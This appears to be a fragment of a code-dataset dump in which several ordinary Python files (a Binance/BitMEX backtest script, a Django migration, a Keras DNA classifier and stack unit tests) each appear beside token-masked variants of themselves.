xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\nset_pause(0.25, 0.35)\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\n<code token>\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\n<code token>\n",
"<import token>\n<code token>\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\n<function token>\n<code token>\n",
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,828 | 98bffef2a9fa1f7d8f13c3fca69e53641be21d6f | #from runner import trade_buySell_Binance
from backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi
import pandas as pd
from binance_API import current_position, market_price_order, get_1min_ohlc_df_binance
from bitmex_API import current_postion_bitmex,bitmex_quote,market_price_order_bitmex
from runner import trade_buySell_Bitmex
from math import floor
#trade_buySell_Bitmex('XBTUSD', 'BTCUSDT', 297)
"""position = current_postion_bitmex('XBTUSD')
print(position)"""
#bitmex_quote("XBTUSD")
#current_postion_bitmex('XBTUSD')
#df = get_1min_ohlc_df_binance('BTCUSDT', 21)
#df.to_csv('Testdata.csv')
df = pd.read_csv('Testdata.csv')
back_test_buy(df)
#output = optimal_distribution_vi(df)
#print(output)
#back_test_buy(df)
"""df = pd.read_csv('BTCUSDT_1min_ohlc_data.csv')
print(df.head())
print(df.tail())
df = df.iloc[-600:]
print(df.size)
print(df.head())
print(df.tail())"""
"""df = get_1min_ohlc_df_binance('BTCUSDT', 1)
df['close'] = pd.to_numeric(df['close'])
df['high'] = pd.to_numeric(df['high'])
df['low'] = pd.to_numeric(df['low'])
df['open'] = pd.to_numeric(df['open'])
print(df.head())
print(df.tail())
back_test_buy(df)"""
#back_test_buy(df)venv\
| [
"#from runner import trade_buySell_Binance\nfrom backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi\nimport pandas as pd\nfrom binance_API import current_position, market_price_order, get_1min_ohlc_df_binance\nfrom bitmex_API import current_postion_bitmex,bitmex_quote,market_price_order_bitmex\nfrom runner import trade_buySell_Bitmex\nfrom math import floor\n\n#trade_buySell_Bitmex('XBTUSD', 'BTCUSDT', 297)\n\"\"\"position = current_postion_bitmex('XBTUSD')\nprint(position)\"\"\"\n#bitmex_quote(\"XBTUSD\")\n#current_postion_bitmex('XBTUSD')\n#df = get_1min_ohlc_df_binance('BTCUSDT', 21)\n#df.to_csv('Testdata.csv')\n\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n\n#output = optimal_distribution_vi(df)\n#print(output)\n#back_test_buy(df)\n\n\n\n\n\n\"\"\"df = pd.read_csv('BTCUSDT_1min_ohlc_data.csv')\n\nprint(df.head())\nprint(df.tail())\ndf = df.iloc[-600:]\nprint(df.size)\nprint(df.head())\nprint(df.tail())\"\"\"\n\n\"\"\"df = get_1min_ohlc_df_binance('BTCUSDT', 1)\n\ndf['close'] = pd.to_numeric(df['close'])\ndf['high'] = pd.to_numeric(df['high'])\ndf['low'] = pd.to_numeric(df['low'])\ndf['open'] = pd.to_numeric(df['open'])\n\nprint(df.head())\nprint(df.tail())\n\nback_test_buy(df)\"\"\"\n\n#back_test_buy(df)venv\\\n",
"from backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi\nimport pandas as pd\nfrom binance_API import current_position, market_price_order, get_1min_ohlc_df_binance\nfrom bitmex_API import current_postion_bitmex, bitmex_quote, market_price_order_bitmex\nfrom runner import trade_buySell_Bitmex\nfrom math import floor\n<docstring token>\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\n<assignment token>\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\n<assignment token>\n<code token>\n<docstring token>\n"
] | false |
99,829 | 56ef650a73b8edbbd235d2b0bb343dd1de8a2519 | # Generated by Django 3.1.7 on 2021-03-19 08:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inno_user', '0021_auto_20210318_1617'),
]
operations = [
migrations.AddField(
model_name='profile',
name='p_html',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='profile',
name='p_image',
field=models.ImageField(upload_to='inno_user/profile/'),
),
]
| [
"# Generated by Django 3.1.7 on 2021-03-19 08:17\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('inno_user', '0021_auto_20210318_1617'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='p_html',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='profile',\n name='p_image',\n field=models.ImageField(upload_to='inno_user/profile/'),\n ),\n ]\n",
"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('inno_user', '0021_auto_20210318_1617')]\n operations = [migrations.AddField(model_name='profile', name='p_html',\n field=models.BooleanField(default=False)), migrations.AlterField(\n model_name='profile', name='p_image', field=models.ImageField(\n upload_to='inno_user/profile/'))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('inno_user', '0021_auto_20210318_1617')]\n operations = [migrations.AddField(model_name='profile', name='p_html',\n field=models.BooleanField(default=False)), migrations.AlterField(\n model_name='profile', name='p_image', field=models.ImageField(\n upload_to='inno_user/profile/'))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,830 | f058fb1be0fb2094485ff54ed5cd83723de341c6 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cross_validation import KFold,StratifiedKFold
from sklearn.linear_model import LogisticRegression
from keras.models import Sequential
from keras.layers import Dense,Activation,Dropout
from keras.callbacks import EarlyStopping
from keras.utils import to_categorical
from keras.metrics import binary_accuracy
import keras
import numpy as np
from sklearn.model_selection import train_test_split
import datetime
def training_vis(hist):
loss = hist.history['loss']
val_loss = hist.history['val_loss']
acc = hist.history['acc']
val_acc = hist.history['val_acc']
# make a figure
fig = plt.figure(figsize=(8,4))
# plot loss
ax1 = fig.add_subplot(121)
ax1.plot(loss,label='train_loss')
ax1.plot(val_loss,label='val_loss')
ax1.set_xlabel('Epochs')
ax1.set_ylabel('Loss')
ax1.set_title('Loss on Training and Validation Data')
ax1.legend()
# plot acc
ax2 = fig.add_subplot(122)
ax2.plot(acc,label='train_acc')
ax2.plot(val_acc,label='val_acc')
ax2.set_xlabel('Epochs')
ax2.set_ylabel('Accuracy')
ax2.set_title('Accuracy on Training and Validation Data')
ax2.legend()
plt.tight_layout()
plt.show()
###neural network model
def nn_model(train_x,train_y,test_x):
model = Sequential()
model.add(Dense(28,input_shape = (train_x.shape[-1],),activation = 'relu'))
model.add(Dropout(0.4))
model.add(Dense(4,activation = 'relu'))
model.add(Dense(2,activation='sigmoid'))
model.summary()
earlystop = EarlyStopping(monitor = 'loss',patience = 3)
model.compile(optimizer = 'adam',loss = 'categorical_crossentropy',metrics = ['accuracy'])
hist = model.fit(train_x,train_y,
# validation_data = (val_x,val_y),
validation_split = 0.1,
batch_size = 8,
callbacks = [earlystop],
epochs = 200)
# visualize the procedure
training_vis(hist)
y_pre = model.predict(test_x)
y_pre = np.argmax(y_pre,1)
# print(y_pre[:3])
return y_pre
def main():
train_dir = "../data/train.csv"
test_dir = "../data/test.csv"
df_train = pd.read_csv(train_dir)
df_test = pd.read_csv(test_dir)
sub = pd.DataFrame()
sub['id'] = df_test['id']
df = pd.concat([df_train.iloc[:,1:-1],df_test.iloc[:,1:]])
y = df_train['label']
trian_row = df_train.shape[0]
print('columns ',df.columns)
print("df head")
print(df.head())
gene_map = {"A":0,"T":1,"C":2,"G":3}
df['sequence'] = df['sequence'].map(list)
df['sequence'] = df['sequence'].map(lambda x : [gene_map[i] for i in x])
for i in range(14):
df['sequence' + str(i)] = list(map(lambda x:x[i],df['sequence']))
del df['sequence']
print("after pre ")
print(df.head())
train = df.iloc[:trian_row:,:]
test = df.iloc[trian_row:,:]
y = to_categorical(y,2)
print('train shape is',train.shape)
print('test shape is',test.shape)
sub["prediction"] = nn_model(train,y,test)
sub['prediction'] = [1 if i > 0.5 else 0 for i in sub['prediction']]
sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sub.to_csv("../result/" + sub_name +".csv",index = None)
print(sub.head())
if __name__ == '__main__':
main() | [
"import pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import KFold,StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Activation,Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils import to_categorical\nfrom keras.metrics import binary_accuracy\nimport keras\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport datetime\n\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n\n # make a figure\n fig = plt.figure(figsize=(8,4))\n # plot loss\n ax1 = fig.add_subplot(121)\n ax1.plot(loss,label='train_loss')\n ax1.plot(val_loss,label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n # plot acc\n ax2 = fig.add_subplot(122)\n ax2.plot(acc,label='train_acc')\n ax2.plot(val_acc,label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n###neural network model\ndef nn_model(train_x,train_y,test_x):\n\tmodel = Sequential()\n\tmodel.add(Dense(28,input_shape = (train_x.shape[-1],),activation = 'relu'))\n\tmodel.add(Dropout(0.4))\n\tmodel.add(Dense(4,activation = 'relu'))\n\tmodel.add(Dense(2,activation='sigmoid'))\n\n\tmodel.summary()\n\tearlystop = EarlyStopping(monitor = 'loss',patience = 3)\n\tmodel.compile(optimizer = 'adam',loss = 'categorical_crossentropy',metrics = ['accuracy'])\n\n\thist = model.fit(train_x,train_y,\n\t\t# validation_data = (val_x,val_y),\n\t\tvalidation_split = 0.1,\n\t\tbatch_size = 8,\n\t\tcallbacks = [earlystop],\n\t\tepochs = 200)\n\t# visualize the procedure\n\ttraining_vis(hist)\n\ty_pre = model.predict(test_x)\n\ty_pre = np.argmax(y_pre,1)\n\t# print(y_pre[:3])\n\treturn y_pre\n\n\ndef main():\n\ttrain_dir = \"../data/train.csv\"\n\ttest_dir = \"../data/test.csv\"\n\tdf_train = pd.read_csv(train_dir)\n\tdf_test = pd.read_csv(test_dir)\n\tsub = pd.DataFrame()\n\tsub['id'] = df_test['id']\n\tdf = pd.concat([df_train.iloc[:,1:-1],df_test.iloc[:,1:]])\n\ty = df_train['label']\n\ttrian_row = df_train.shape[0]\n\tprint('columns ',df.columns)\n\tprint(\"df head\")\n\tprint(df.head())\n\tgene_map = {\"A\":0,\"T\":1,\"C\":2,\"G\":3}\n\tdf['sequence'] = df['sequence'].map(list)\n\tdf['sequence'] = df['sequence'].map(lambda x : [gene_map[i] for i in x])\n\tfor i in range(14):\n\t\tdf['sequence' + str(i)] = list(map(lambda x:x[i],df['sequence']))\n\tdel df['sequence']\n\tprint(\"after pre \")\n\tprint(df.head())\n\ttrain = df.iloc[:trian_row:,:]\n\ttest = df.iloc[trian_row:,:]\n\ty = to_categorical(y,2)\n\tprint('train shape is',train.shape)\n\tprint('test shape is',test.shape)\n\tsub[\"prediction\"] = nn_model(train,y,test)\n\tsub['prediction'] = [1 if i > 0.5 else 0 for i in sub['prediction']]\n\tsub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\tsub.to_csv(\"../result/\" + sub_name +\".csv\",index = None)\n\tprint(sub.head())\n\n\nif __name__ == '__main__':\n\tmain()",
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import KFold, StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils import to_categorical\nfrom keras.metrics import binary_accuracy\nimport keras\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport datetime\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\n<code token>\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,831 | 4755024900f375d46672ee321fa0044e23ef68ac | ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), ('CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)] | [
"ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), ('CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)]",
"ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), (\n 'CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)]\n",
"<assignment token>\n"
] | false |
99,832 | e11fe5744be6dc24c84a6611b3cf054d58440988 | import unittest
# Use the imports below to test either your array-based stack
# or your link-based version
#from stack_array import Stack
from stack_linked import Stack
class TestLab2(unittest.TestCase):
def test_simple(self):
stack = Stack(5)
stack.push(0)
self.assertFalse(stack.is_empty())
self.assertFalse(stack.is_full())
self.assertEqual(stack.size(),1)
def test_simple_2(self):
#checks that the pop and isEmpty method are working
stack = Stack(7)
stack.push(3)
self.assertFalse(stack.is_empty())
stack.pop()
self.assertTrue(stack.is_empty())
def test_simple_3(self):
#checks the is_full method for working
stack = Stack(1)
stack.push(4)
self.assertTrue(stack.is_full)
def test_simple_4(self):
#checks the peek method
stack = Stack(0)
with self.assertRaises(IndexError):
stack.peek()
stack = Stack(7)
stack.push(4)
stack.push(3)
self.assertEqual(stack.peek(), 3)
stack.pop()
self.assertEqual(stack.peek(), 4)
def test_simple_5(self):
#testing of the push method
stack = Stack(2)
stack.push(3)
stack.push(2)
with self.assertRaises(IndexError):
stack.push(4)
def test_simple_6(self):
#testing of the pop method
stack = Stack(0)
with self.assertRaises(IndexError):
stack.pop()
def test_simple_7(self):
#testing of none
stack = Stack(None)
with self.assertRaises(IndexError):
stack.push('hello')
def test_simple_8(self):
stack = Stack(0)
self.assertTrue(stack.is_full)
if __name__ == '__main__':
unittest.main()
| [
"import unittest\n\n# Use the imports below to test either your array-based stack\n# or your link-based version\n#from stack_array import Stack\nfrom stack_linked import Stack\n\nclass TestLab2(unittest.TestCase):\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(),1)\n \n def test_simple_2(self):\n #checks that the pop and isEmpty method are working\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n #checks the is_full method for working\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n \n\n def test_simple_4(self):\n #checks the peek method\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n \n def test_simple_5(self):\n #testing of the push method\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n #testing of the pop method\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n \n def test_simple_7(self):\n #testing of none\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n \n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n \n\n \n\n\nif __name__ == '__main__': \n unittest.main()\n",
"import unittest\nfrom stack_linked import Stack\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
